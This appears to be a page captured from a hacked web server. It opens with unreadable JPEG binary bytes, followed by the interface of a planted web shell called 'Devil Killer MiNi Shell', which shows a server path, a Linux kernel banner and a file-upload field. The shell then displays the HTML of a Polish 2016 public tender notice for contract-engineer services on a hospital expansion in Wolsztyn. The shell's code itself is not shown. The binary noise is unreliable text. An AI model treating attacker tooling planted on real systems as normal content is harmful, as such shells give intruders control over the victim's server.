JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160421/99340-N-2016.html

<p class="kh_header"><b>Wolsztyn: pełnienie funkcji Inżyniera Kontraktu przy realizacji I etapu inwestycji pod nazwą: przebudowa i rozbudowa obiektów Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wolsztynie w celu dostosowania do wymagań Rozporządzenia Ministra Zdrowia z dnia 26.06.2012r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. 2012, poz. 739)</b><br>
<b>Numer ogłoszenia: 99340 - 2016; data zamieszczenia: 21.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Wschowska 3, 64-200 Wolsztyn, woj. wielkopolskie, tel. 68 347 73 00, 347 73 63, faks 68 3842590.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozwolsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pełnienie funkcji Inżyniera Kontraktu przy realizacji I etapu inwestycji pod nazwą: przebudowa i rozbudowa obiektów Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wolsztynie w celu dostosowania do wymagań Rozporządzenia Ministra Zdrowia z dnia 26.06.2012r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. 2012, poz. 739).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -Przedmiot zamówienia obejmuje usługę zarządzania przedsięwzięciem inwestycyjnym polegającym na realizacji I etapu inwestycji pod nazwą: przebudowa i rozbudowa obiektów Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wolsztynie w celu dostosowania do wymagań Rozporządzenia Ministra Zdrowia z dnia 26.06.2012r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. 2012, poz. 739) na podstawie dokumentacji projektowej sporządzonej przez Architektoniczną Pracownię Projektową Tomasz Drożdżyński z siedzibą w Poznaniu, ul. Konińska 18.
-Dodatkowy opis przedmiotu zamówienia zawarty jest we wzorze Umowy stanowiącym załącznik nr 8 do niniejszej SIWZ.
-Wykonanie I etapu inwestycji obejmuje:
Budowę nowego obiektu (budynek F) na terenie administracyjnym, na którym zlokalizowane są budynki wchodzące w skład Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wolsztynie, to jest na działce ewidencyjnej o numerze 346 7 w Wolsztynie. Na czas realizacji umowy o roboty budowlane nie przewiduje się wyłączania statutowej i ustawowej działalności Szpitala w zakresie udzielania świadczeń zdrowotnych.
-W ramach budowy przewiduje się, że nowy budynku F zostanie wykonany w stanie surowym z wykonaniem sieci, instalacji dla możliwości podłączenia oddziałów, wykonanie kondygnacji technicznej, kotłowni, klatek schodowych (całe z oddymianiem) hollu, podjazdu dla karetek, zagospodarowanie terenu i remont stacji trafo,
-Rozkład funkcji nowego budynku F jest następujący:
Parter (653,1m2,):
-Szpitalny Oddział Ratunkowy, 
-wejście do budynku z zewnątrz (z półpiętra)
I piętro (902,1m2): 
-komunikacja ogólna połączona z istniejącą częścią szpitala,
-Blok Operacyjny,
-Centralna Sterylizatornia (do późniejszego zagospodarowania)
II piętro (876,9m2 ): 
-Oddział Chirurgiczny (część),
-Oddział Anestezjologii i Intensywnej Terapii
III piętro (896,9m2 [z częścią O.Porodowego w bud.B): 
-Oddział Porodowy,
-Oddział Położniczy,
-Oddział Neonatologiczny,
kondygnacja techniczna (370,8m2): 
-droga ewakuacyjna,
-kotłownia gazowa,
-wentylatornia,
-Nowy budynek F ma być połączony funkcjonalnie z istniejącym budynkiem B w tym ostatnia kondygnacja budynku B z klatką schodową budynku F
-Budynek F połączony z budynkiem E poprzez nowo wybudowana windę,
-wykonanie w budynku F na I piętrze - Bloku operacyjnego z 2. windami (2 szt.), agregatem porądotwórczym oraz z przekuciem do budynku B oraz wydzieleniem pomieszczeń na sterylizatornię,
-wykonanie w budynku F na II piętrze Oddziału AIiT 
-wyburzenie budynku magazynowo- warsztatowego o pow. 176m2. Wysokość budynku w trakcie podłużnym do 3,78m w trakcie poprzecznym do 4,9m. Budynek mieści warsztaty, magazyny, pomieszczenie biurowe i zaplecze sanitarne,
-demontaż zbiornika na wodę wraz z przebudową i budową infrastruktury technicznej.
Wykonywanie funkcji Inżyniera Kontraktu w czasie trwania robót budowlanych na podstawie art. 34 ust. 5 ustawy PZP, Zamawiający przewiduje możliwość rozszerzenia zakresu czynności Inżyniera kontraktu na czas do uzyskania pozwolenia na użytkowanie obiektu (do 3 m-cy od podpisania protokołu odbioru końcowego robót budowlanych).
-W trakcie realizacji zamówienia wykonawca ma obowiązek współpracować i współdziałać z osobą pełniącą nadzór autorski nad projektem robot budowlanych. Zamawiający przewiduje, że osobą pełniącą nadzór autorski będzie autor projektu budowlanego. 
-Zamawiający wymaga obecności inżyniera Kontraktu na terenie budowy w dniach od poniedziałku do piątku przez minimum 8 godzin dziennie od godziny 7.00, za wyjątkiem Świąt i dni wolnych od pracy oraz w soboty w przypadku wykonywania robot budowlanych na czas niezbędny do nadzoru wykonywania tych robot..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium, na cały okres związania Ofertą, w wysokości 6.000 PLN (słownie: dziesięć tysięcy złotych). 
Wadium musi być wniesione przed upływem terminu składania Ofert i musi obejmować okres związania Ofertą, tj. 30 dni. Bieg terminu związania Ofertą rozpoczyna się wraz z upływem terminu składania Ofert.
Wadium może być złożone w jednej lub kilku formach określonych w art. 45 ust. 6 Ustawy PZP, tj.
3.1.	Pieniądzu.
3.2.	Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
3.3.	Gwarancjach bankowych.
3.4.	Gwarancjach ubezpieczeniowych.
3.5.	Poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
W przypadku wnoszenia przez Wykonawcę wadium w formach jak w pkt 3.2. - 3.5., gwarancja (poręczenie) musi być gwarancją (poręczeniem) bezwarunkową, nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego. Gwarancja (poręczenie) ponadto musi zawierać zapis, który będzie stanowił, iż Zamawiający zatrzyma wadium, jeżeli zajdą okoliczności przewidziane w Ustawie PZP (art. 46 ust. 4a lub art. 46 ust. 5 Ustawy PZP). Gwarancja (poręczenie) musi być podpisana przez osoby umocowane przez Gwaranta (Poręczyciela). Gwarancje (poręczenia) powinny zawierać oprócz elementów właściwych dla każdej formy, określonych przepisami prawa:
1.1.	Wskazanie jako Beneficjenta - Zamawiającego.
1.2.	Określenie przedmiotu postępowania (nazwa zamówienia i numer postępowania).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:

Bank PKO BP SA o/Wolsztyn
nr rach: 04 1020 4144 0000 6102 0060 7234
z dopiskiem Wadium - nazwa Wykonawcy - Postępowanie nr PN102016
Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania rachunku bankowego Zamawiającego.
-Wykonawca powinien dołączyć do Oferty dowód wniesienia wadium:
8.1.	Potwierdzenie dokonanego przelewu - w przypadku wniesienia wadium w pieniądzu. 
8.2.	Oryginał odpowiedniego dokumentu - w przypadku wniesienia wadium w innej dopuszczonej formie.
-Oryginał dokumentu potwierdzającego wniesienie Wadium musi być złożony w odrębnej kopercie załączonej do oryginału Oferty. W oryginale Oferty jako załącznik należy załączyć kserokopię oryginału dokumentu potwierdzającego wniesienie wadium, potwierdzonego za zgodność z oryginałem. W kopiach Oferty muszą znajdować się kserokopie dokumentu potwierdzającego wniesienie Wadium. 
-Wykonawca, który nie wniesie wadium w wymaganej formie albo wysokości lub nie dołączy do Oferty odpowiedniego dowodu jego wniesienia, lub też nie wniesie wadium na cały okres związania Ofertą, zostanie wykluczony z ubiegania się o udzielenie zamówienia będącego przedmiotem niniejszego postępowania.
-Zamawiający zwróci wszystkim Wykonawcom wadium niezwłocznie po wyborze Oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego Oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 14. Wykonawcy, którego Oferta została wybrana jako najkorzystniejsza, wadium zostanie zwrócone niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
-Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał Ofertę przed upływem terminu składania Ofert.
-Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodnie z ust. 11., jeżeli w wyniku rozstrzygnięcia odwołania jego Oferta została wybrana jako najkorzystniejsza. Wykonawca zobowiązany będzie do wniesienia wadium w terminie wskazanym przez Zamawiającego.
-Wadium wniesione w pieniądzu Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
-Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego Oferta została wybrana:
15.1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w Ofercie,
15.2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
15.3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
-Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy PZP , z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Ustawy PZP, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Ustawy PZP, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Ustawy PZP, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-O udzielenie zamówienia mogą się starać Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonali co najmniej 1 usługę polegającą na kompleksowym zarządzaniu budową lub rozbudową obiektu budowlanego użyteczności publicznej jako inżynier kontraktu lub inwestor zastępczy wraz z uzyskaniem pozwolenia na użytkowanie, o powierzchni nie mniejszej niż 3000m2 i wartości nie mniejszej niż 10 mln zł netto. Przez kompleksowe zarządzanie należy rozumieć pełnienie funkcji inżyniera kontraktu i koordynacji nadzoru inwestorskiego we wszystkich branżach zgodnie z Prawem budowlanym oraz wykonywanie czynności managerskich na rzecz inwestora w relacjach z wykonawcą i  podwykonawcami  robót budowlanych obejmujących co najmniej:
-Nadzorowanie jakości prac budowlanych, w tym pełnienie funkcji nadzoru inwestorskiego we wszystkich branżach zgodnie z Prawem Budowlanym.
-Nadzorowanie dokumentacji budowy, tj. kontrolowanie jej tworzenia, weryfikowanie jej poprawności, organizowanie i nadzorowanie obiegu dokumentów, archiwizowanie dokumentacji.
-Prowadzenie regularnych koordynacyjnych narad budowlanych.
-Akceptację podwykonawców i kontrolę rozliczeń pomiędzy nimi a generalnym wykonawcą.
-Zarządzanie harmonogramem, tj. stałą kontrolę terminów wykonywania robót budowlanych, wskazywanie opóźnień i zagrożeń wykonawcy robót, nadzór nad wdrożeniem programów naprawczych.
-Prowadzenie rozliczeń finansowych, tj. zatwierdzanie okresowych protokołów zaawansowania finansowego robót, sporządzanie świadectw płatności, sporządzenie Tabeli Środków Trwałych.
Ocena powyższych warunków zostanie dokonana na podstawie oświadczenia Wykonawcy i dokumentów zgodnie z wykazem  stanowiącym załącznik nr 4.

Zgodnie z art. 26 ust. 2 b Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się strać Wykonawcy, którzy posiadają zespół osób niezbędnych do wykonania do wykonania zamówienia, to jest 

-Posiadają zespół do wykonania przedmiotowego zamówienia, w składzie:

Kierownik Inżyniera Kontraktu
Kwalifikacje i umiejętności: posiada wykształcenie wyższe.
Doświadczenie zawodowe: co najmniej pięcioletnie doświadczenie w pełnieniu funkcji kierownika Inżyniera Kontraktu  Inwestora Zastępczego. Ponadto pełnił funkcję Kierownika Inżyniera Kontraktu  Inwestora Zastępczego w co najmniej dwóch zadaniach inwestycyjnych (dwa różne kontrakty) polegających na budowie lub rozbudowie budynku użyteczności publicznej o powierzchni nie mniejszej niż 3000m2 i wartości robót budowlanych nie mniejszej niż 10 mln zł netto - dla każdej z usług
-Inspektor Nadzoru branży konstrukcyjno-budowlanej
Kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub uprawnienia równoważne do podanych powyżej wg rozporządzeń w sprawie samodzielnych funkcji technicznych w budownictwie obowiązujących przed rokiem 2006 lub odpowiadające im ważne uprawnienia budowlane wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, w tym w trybie uznawania kwalifikacji zawodowych cudzoziemców oraz przynależność do właściwej izby samorządu zawodowego, 
Doświadczenie zawodowe: co najmniej pięcioletnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w branży konstrukcyjno-budowlanej. Ponadto pełnił funkcję inspektora nadzoru inwestorskiego w branży konstrukcyjno-budowlanej w co najmniej dwóch zadaniach inwestycyjnych (dwa różne kontrakty) polegających na budowie budynku użyteczności publicznej o powierzchni nie mniejszej niż 3000m2 i wartości robót budowlanych nie mniejszej niż 10 mln zł netto - dla każdej z usług
-Inspektor Nadzoru branży instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, energetycznych, teletechnicznych 
Kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych powyżej 1 kV lub uprawnienia równoważne do podanych powyżej wg rozporządzeń w sprawie samodzielnych funkcji technicznych w budownictwie obowiązujących przed rokiem 2006 lub odpowiadające im ważne uprawnienia budowlane wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, w tym w trybie uznawania kwalifikacji zawodowych cudzoziemców oraz przynależność do właściwej izby samorządu zawodowego.

Doświadczenie zawodowe: co najmniej pięcioletnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w branży instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych powyżej 1 kV. Ponadto pełnił funkcję inspektora nadzoru inwestorskiego  w branży instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych powyżej 1 kV w co najmniej dwóch zadaniach inwestycyjnych (dwa różne kontrakty) polegających na budowie budynku użyteczności publicznej o powierzchni nie mniejszej niż 3000m2 i wartości robót budowlanych nie mniejszej niż 10 mln zł netto - dla każdej z usług

Inspektor Nadzoru branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
Kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub uprawnienia równoważne do podanych powyżej wg rozporządzeń w sprawie samodzielnych funkcji technicznych Wykonawca budownictwie obowiązujących przed rokiem 2006 lub odpowiadające im ważne uprawnienia budowlane wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, w tym w trybie uznawania kwalifikacji zawodowych cudzoziemców oraz przynależność do właściwej izby samorządu zawodowego.

Doświadczenie zawodowe: co najmniej pięcioletnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Ponadto pełnił funkcję inspektora nadzoru inwestorskiego w branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych w co najmniej dwóch zadaniach inwestycyjnych (dwa różne kontrakty) polegających na budowie budynku użyteczności publicznej o powierzchni nie mniejszej niż 3000m2 i wartości robót budowlanych nie mniejszej niż 10 mln zł netto - dla każdej z usług

Ocena powyższych warunków zostanie dokonana na podstawie oświadczenia Wykonawcy i wykazu - załącznik nr 5.  

Zgodnie z art. 26 ust. 2 b Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 10 mln zł.
-posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 100 tys. złotych.

Ocena powyższych warunków zostanie dokonana na podstawie oświadczenia Wykonawcy oraz przedłożenia do Oferty dokumentów, o których mowa w rozdziale VI SIWZ.

Zgodnie z art. 26 ust. 2 b Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.

Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie nie ponosi winy.

-Ocena warunków uczestnictwa w postępowaniu odbywać się będzie na zasadzie kryterium spełnia nie spełnia w oparciu o oświadczenia i dokumenty wymienione w rozdziale VI niniejszej SIWZ. Wykonawca, który nie spełni któregokolwiek ze wskazanych wyżej warunków zostanie wykluczony z prowadzonego postępowania z zastrzeżeniem wyjątków przewidzianych w art. 26 PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
